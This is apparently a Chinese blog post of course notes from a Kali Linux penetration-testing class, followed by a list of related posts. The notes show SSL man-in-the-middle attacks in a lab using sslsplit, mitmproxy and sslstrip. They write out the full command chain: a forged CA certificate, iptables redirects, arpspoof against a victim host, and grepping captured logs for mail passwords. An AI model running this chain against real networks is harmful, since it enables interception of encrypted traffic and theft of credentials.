1. 程式人生 > >Kali Linux滲透測試 104 SSL 中間人攻擊

Kali Linux滲透測試 104 SSL 中間人攻擊

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程

1. SSL 中間人攻擊
2. sslsplit
3. Mitmproxy
4. sslstrip

1. SSL 中間人攻擊

  1. 攻擊者未與客戶端和伺服器通訊鏈路中

    • ARP
    • DHCP
    • 修改閘道器
    • 修改 dns
    • 修改 hosts
    • ICMP、STP、OSPF
  2. 攻擊過程

  3. 攻擊的前提

    • 客戶端已經信任偽造證書頒發機構
    • 攻擊者控制了合法證書頒發機構
    • 客戶端控制了合法證書頒發機構
    • 客戶端程式禁止了顯示證書錯誤告警資訊
    • 攻擊者已經控制了客戶端,並強制其信任偽造證書

2. sslsplit

  1. 簡介

    • 透明SSL中間人攻擊工具
    • 對客戶端偽裝成伺服器,對伺服器偽裝成普通客戶端
    • 偽裝伺服器需要偽造證書,需要現在本地生成偽造證書
    • 支援 SSL 加密的 SMTP、POP3、FTP等通訊中間人攻擊
  2. 利用openssl 生成證書私鑰

    [email protected]:~# openssl genrsa -out ca.key 2048
        Generating RSA private key, 2048 bit long modulus
        ............................................+++
        ...+++
        e is 65537 (0x010001)
    
  3. 利用私鑰簽名生成證書

    [email protected]:~# openssl req -new -x509 -days 1096 -key ca.key -out ca.crt
        You are about to be asked to enter information that will be incorporated
        into your certificate request.
        What you are about to enter is what is called a Distinguished Name or a DN.
        There are quite a few fields but you can leave some blank
        For some fields there will be a default value,
        If you enter '.', the field will be left blank.
        -----
        Country Name (2 letter code) [AU]:CN
        State or Province Name (full name) [Some-State]:jilin   
        Locality Name (eg, city) []:changchun
        Organization Name (eg, company) [Internet Widgits Pty Ltd]:alibaba
        Organizational Unit Name (eg, section) []:ali
        Common Name (e.g. server FQDN or YOUR name) []:alibaba
        Email Address []:
    [email protected]
  4. 攻擊者開啟路由功能

    [email protected]:~# vim /etc/sysctl.conf
    net.ipv4.ip_forward=1

  5. 配置 iptables 規則

    # 檢視規則
    [email protected]:~# iptables -t nat -L -n
    
    # 清空規則
    [email protected]:~# iptables -t nat -F
    
    # 檢視 80 和 443 埠是否有佔用
    [email protected]:~# netstat -tulnp | grep 80
    [email protected]:~# netstat -tulnp | grep 443
    
    # 編寫規則
    # PREROUTING:路由生效之前執行規則
    
    # 發給 80 埠的流量轉發給 8080
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
    
    # 發給 443 埠的流量轉發給 8443
    iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
    
    # MSA:郵件提交代理
    iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 
    
    # SMTPS:簡單郵件傳輸
    iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 
    
    # IMAPS:接收郵件
    iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 
    
    # POP3S:郵件傳輸
    iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 
    
    iptables -t nat -L -n
    
  6. 檢視被攻擊者的機器

    IPv4 地址 . . . . . . . . . . . . : 10.10.10.133
    子網掩碼  . . . . . . . . . . . . : 255.255.255.0
    預設閘道器. . . . . . . . . . . . . : 10.10.10.2
    DHCP 伺服器 . . . . . . . . . . . : 10.10.10.254
    

  7. kali 實現 arp 欺騙

    # kali IP:10.10.10.131
    # kali MAC:00:0c:29:89:71:eb 
    
    # 向區域網廣播,閘道器 10.10.10.2 的 MAC 地址為本機 的 MAC:0:c:29:89:71:eb
    [email protected]:~# arpspoof -i eth0 -t 10.10.10.133 -r 10.10.10.2
    

  8. 啟動 sslsplit 進行攻擊

    • 建立目錄

      [email protected]:~# mkdir -p /root/test/logdir/

    • 偵聽 8080 和 8443

      sslsplit -D -l connect.log -j /root/test -S /root/test/logdir -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

  9. 被攻擊者訪問 https 網站

    https://www.taobao.com
    




  10. 攻擊者檢視捕獲的內容


  11. 被攻擊者訪問 163 郵箱

    https://mail.163.com/
    

    [email protected]:~/test/logdir# grep 456456 *
    

    [email protected]:~/test/logdir# grep password *
    

  12. 為了避免證書報錯,可以安裝根證書

    將生成的 cs.crt 拷貝到 被攻擊者機器上
    


  13. 在此訪問淘寶

    不再提醒證書錯誤
    

3. Mitmproxy

  1. kali 實現 arp 欺騙

    # kali IP:10.10.10.131
    # kali MAC:00:0c:29:89:71:eb 
    
    # 向區域網廣播,閘道器 10.10.10.2 的 MAC 地址為本機 的 MAC:0:c:29:89:71:eb
    [email protected]:~# arpspoof -i eth0 -t 10.10.10.133 -r 10.10.10.2
    

  2. 防火牆規則

    # Mitmproxy 只支援在 8080 偵聽
    iptables -t nat -F
    iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
    iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
    
  3. mitmproxy 啟動

    mitmproxy -T --host -w mitmproxy.log
    
  4. 被攻擊者登入

    https://mail.163.com/
    

  5. 攻擊者

    [email protected]:~# ll mitmproxy.log 
    -rw-r--r-- 1 root root 688868 3月  26 09:50 mitmproxy.log
    

4. sslstrip

  1. 簡介

    • 與前兩種工具不同,將客戶端到中阿金人之間的流量變為明文
    • sslstrip -l 8080
  2. kali 實現 arp 欺騙

    # kali IP:10.10.10.131
    # kali MAC:00:0c:29:89:71:eb 
    
    # 向區域網廣播,閘道器 10.10.10.2 的 MAC 地址為本機 的 MAC:0:c:29:89:71:eb
    [email protected]:~# arpspoof -i eth0 -t 10.10.10.133 -r 10.10.10.2
    

  3. 攻擊者啟動 sslstrip

    [email protected]:~# sslstrip -l 8080
    sslstrip 0.9 by Moxie Marlinspike running...
    
  4. 檢視日誌

    [email protected]:~# cat sslstrip.log 
    

相關推薦

Kali Linux滲透測試 104 SSL 中間人攻擊

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. SSL 中間人攻擊 2. sslspl

Kali linux滲透測試系列————28、Kali linux 滲透攻擊之社會工程學攻擊

社會工程學社會工程學是利用人性的弱點體察、獲取有價值資訊的實踐方法,它是一種期盼的藝術。在缺少目標系統的必要資訊時,社會工程學技術是滲透測試人員獲取資訊的至關重要的手段。對於素有型別的組織而言,人都是安全防範措施李最為薄弱的一個環節,也是整個安全基礎設施最脆弱的層面。從安全的

Kali linux滲透測試系列————23、Kali linux 滲透攻擊之伺服器端攻擊

漏洞評估伺服器端攻擊即找出並利用伺服器上的服務、埠和應用程式中的漏洞。舉個例子,Web伺服器都有多個攻擊途徑(Attack Vector)。它會執行一個作業系統,並執行各種各樣的軟體來提供Web功能。它會有很多開啟的TCP埠。這些途徑中的每一個都有可能找出一個攻擊者能利用的漏

【安全牛學習筆記】Kali Linux滲透測試方法

信息安全 kali linux security+ 1.安全問題的根源①由於分層思想,導致每個層次的相關人員都只關心自己層次的工作,因此每個人認識系統都是片面的,而安全是全方位的,整體的,所以造成安全問題。②技術人員追求效率,導致只追求功能實現,而很容易忽略安全性的工作③由於人都是會犯錯誤的,因此

kali linux滲透測試——信息收集

新網數碼 例子 .cn 收集 主機 工具 dns服務 發送 分析 一.公開網站 我們可以通過公開網站收集目標域的有關信息,這樣我們不必向目標網絡直接發送數據,從而避免使目標察覺我們的行動。 自行百度,不再贅述。 二.域名的註冊信息 whois數據庫記錄有該域名的DNS

Kali Linux 滲透測試:掃描漏洞

                                     Kali Lin

Kali Linux 滲透測試手冊(1.1)安裝虛擬機器

翻譯來自:掣雷小組 成員資訊: thr0cyte, Gr33k, 花花, 小丑, R1ght0us, 7089bAt, 一.配置KALI Linux和滲透測試環境 在這一章,我們將覆蓋以下內容: 在Windows和Linux上安裝VirtualBox 建立一個Kali L

【安全牛學習筆記】​Kali Linux滲透測試介紹

Kali Linux滲透測試介紹 安全問題的根源         優點:分工明確,工作效率高。(把大問題簡化成易於解決的小問題)         缺點:從業人員對系統沒有整體的認識,對安全認識較為片面。(搞技術的為了提高工作效率,只追求功能實現, 很少能在實現功能後

Kali Linux滲透測試 021 主動資訊收集

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. 簡介 直接與目標系統互動通訊 無法避免留下訪問的痕跡 使用受控的第三方電腦進行探測

Kali Linux滲透測試 101 手動漏洞挖掘-CSRF 漏洞

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. 簡介 2. 判斷漏洞 3. 伺服器原始

Kali linux滲透測試系列————12、Kali linux資訊收集之作業系統識別

識別作業系統在確定目標主機線上之後,應當識別他們使用的作業系統。這階段工作通常稱為識別作業系統(也稱為作業系統指紋識別)。識別作業系統的方式有三種:主動式和被動式。主動式識別工具向目標主機發送資料包,並根據目標的響應來確定其使用的作業系統。這種方式的優點在於探測速度快,缺點是

Kali Linux滲透測試 045 讀取windows本地密碼

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. 抓包嗅探 2. 鍵盤記錄本地密碼 3. 檢視本地快取密碼 4. WCE (WINDOWS

Kali linux滲透測試(一)

最近在學習kali,所以開個系列來記錄下吧 0x01 寫在前面 要養成從根源解決問題的習慣 安全問題的根源 分層思想的優劣(化整為零,把大化小,逐一實現) 只追求功能的實現(久而久之,眼光侷限,沒辦法看全域性,看整體——安全) 最大的安全威脅是人(人

【安全牛學習筆記】Kali Linux滲透測試介紹

​Kali Linux滲透測試介紹      安全問題的根源         優點:分工明確,工作效率高。         缺點:從業人員對系統沒有整體的認識,對安全認識較為片面。         最大威脅是人,人都會犯錯,安全問題不能100%絕對根除。    

Kali Linux滲透測試 049 清除痕跡

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. 清除滲透攻擊痕跡 1.清除滲透攻擊痕跡 最多也只是清除本地記錄,如果有日誌伺服器的話還是會被

Kali linux滲透測試系列————34、Kali linux 維持訪問之建立Web後門

WeBaCooWeBaCoo(Web Backdoor Cookie)是一款隱蔽的指令碼類Web後門工具。藉助HTTP協議,它可以在客戶端和伺服器端實現執行程式碼的網頁終端。WeBaCoo有兩種工作模式:Generation(生產線模式):指定-g選項可進入這種模式。使用者可

Kali linux滲透測試系列————13、Kali linux資訊收集之埠掃描

埠掃描簡單來說埠掃描就是一種用來確定目標主機的TCP埠和UDP埠狀態的方法。主機開發了某個埠,就意味著他在中國埠提供某種網路服務。如果某個埠處於關閉狀態,這說明主機在這個埠上並沒有提供網路服務。在確定某埠開發狀態之後,攻擊人員就會檢查在該埠提供相應的服務的程式版本,以判斷這個

kali linux 滲透測試 第五章 netcat--nc

繼續記筆記~~~ 有了netcat,可以不用telnet了 nc的作用: 偵聽模式 / 傳輸模式 telnet / 獲取banner資訊 傳輸文字資訊 傳輸檔案/目錄 加密傳輸文檔案 遠端控制/木木⻢馬 加密所有流量 流媒體伺服器 遠端克隆

我的Kali Linux滲透測試學習之路

少壯不努力,老大徒傷悲。這句話時刻提醒著我,我是一名本科學生,自從今年我的同學把這一網站推薦了給我。通過我的同學說他不斷的聽課請教老師,能把多種知識融匯貫通,讓他感覺自己就像一個什麼都不懂的2B程式設計師成為一個網路大佬。現在我已經快畢業了,在安全牛課堂我打算學網路方面的知

Kali Linux 滲透測試 部落格記錄

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 ————————基本環境———————— Kali Linux滲透測試 001 安裝環境 Ka